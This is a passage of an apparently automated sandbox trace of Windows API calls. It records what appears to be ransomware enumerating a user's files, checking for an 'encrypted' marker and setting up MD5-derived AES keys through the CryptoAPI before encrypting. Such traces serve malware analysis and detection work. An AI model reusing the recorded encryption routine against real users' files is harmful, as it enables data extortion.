cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.467] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.467] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ntact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.467] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ontact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.467] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="contact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.467] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".contact", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0029.467] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0x0, dwReserved1=0x777648, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0x7c20c0 [0029.467] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0029.467] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0x0, dwReserved1=0x777648, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0x7c20c0 [0029.467] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0029.467] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0029.467] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0029.467] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.467] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1ijelx2uuwgwpQu0c7o2.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1ijelx2uuwgwpqu0c7o2.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0029.468] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.468] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0029.468] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.468] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.468] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0029.468] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0029.468] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0029.468] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.468] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.468] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.468] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0029.468] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1ijelx2uuwgwpQu0c7o2.wav", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d8b660, ftCreationTime.dwHighDateTime=0x1d5b7e5, ftLastAccessTime.dwLowDateTime=0x65c8b140, ftLastAccessTime.dwHighDateTime=0x1d5c48a, ftLastWriteTime.dwLowDateTime=0x65c8b140, ftLastWriteTime.dwHighDateTime=0x1d5c48a, nFileSizeHigh=0x0, nFileSizeLow=0x8fe2, dwReserved0=0x0, dwReserved1=0x777648, cFileName="1ijelx2uuwgwpQu0c7o2.wav", cAlternateFileName="1IJELX~1.WAV")) returned 0x7c20c0 [0029.468] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0029.468] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1ijelx2uuwgwpQu0c7o2.wav", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d8b660, ftCreationTime.dwHighDateTime=0x1d5b7e5, ftLastAccessTime.dwLowDateTime=0x65c8b140, ftLastAccessTime.dwHighDateTime=0x1d5c48a, ftLastWriteTime.dwLowDateTime=0x65c8b140, ftLastWriteTime.dwHighDateTime=0x1d5c48a, nFileSizeHigh=0x0, nFileSizeLow=0x8fe2, dwReserved0=0x0, dwReserved1=0x777648, cFileName="1ijelx2uuwgwpQu0c7o2.wav", cAlternateFileName="1IJELX~1.WAV")) returned 0x7c20c0 [0029.468] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0029.468] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1ijelx2uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.468] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1ijelx2uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.468] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1ijelx2uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.468] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1ijelx2uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1ijelx2uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\1ijelx2uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\1ijelx2uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\1ijelx2uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\1ijelx2uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\1ijelx2uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\1ijelx2uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\1ijelx2uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\1ijelx2uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\1ijelx2uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\1ijelx2uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\1ijelx2uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\1ijelx2uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\1ijelx2uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\1ijelx2uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\1ijelx2uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\1ijelx2uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\1ijelx2uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\1ijelx2uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\1ijelx2uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\1ijelx2uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\1ijelx2uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\1ijelx2uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\1ijelx2uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\1ijelx2uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\1ijelx2uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\1ijelx2uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\1ijelx2uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\1ijelx2uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\1ijelx2uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\1ijelx2uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\1ijelx2uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\1ijelx2uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\1ijelx2uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\1ijelx2uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1ijelx2uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ijelx2uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jelx2uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="elx2uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lx2uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x2uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uuwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uwgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wgwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gwpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wpQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pQu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qu0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="u0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c7o2.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.470] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0029.470] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0029.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0029.470] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1ijelx2uuwgwpQu0c7o2.wav", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d8b660, ftCreationTime.dwHighDateTime=0x1d5b7e5, ftLastAccessTime.dwLowDateTime=0x65c8b140, ftLastAccessTime.dwHighDateTime=0x1d5c48a, ftLastWriteTime.dwLowDateTime=0x65c8b140, ftLastWriteTime.dwHighDateTime=0x1d5c48a, nFileSizeHigh=0x0, nFileSizeLow=0x8fe2, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="1ijelx2uuwgwpQu0c7o2.wav", cAlternateFileName="1IJELX~1.WAV")) returned 0x7c2240 [0029.470] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0029.470] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0029.470] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.470] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0029.471] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0029.471] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.471] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.471] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0029.472] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0029.472] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0029.472] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0029.472] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0029.472] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.472] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0029.472] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.472] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0029.472] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.472] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0029.472] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0029.472] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0029.472] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.472] CryptHashData (hHash=0x7c2100, pbData=0x7c7758, dwDataLen=0x100, dwFlags=0x1) returned 1 [0029.472] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0029.472] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0029.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0029.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0029.473] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.473] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0029.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0029.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0029.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0029.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0029.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0029.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0029.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0029.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0029.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0029.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0029.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0029.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0029.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0029.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0029.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0029.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0029.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0029.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0029.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0029.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0029.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0029.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0029.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0029.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0029.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0029.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0029.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0029.473] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0029.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0029.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0029.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0029.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0029.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0029.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0029.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0029.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0029.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0029.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0029.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0029.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0029.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0029.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0029.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0029.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0029.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0029.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0029.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0029.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0029.474] HeapFree (in: 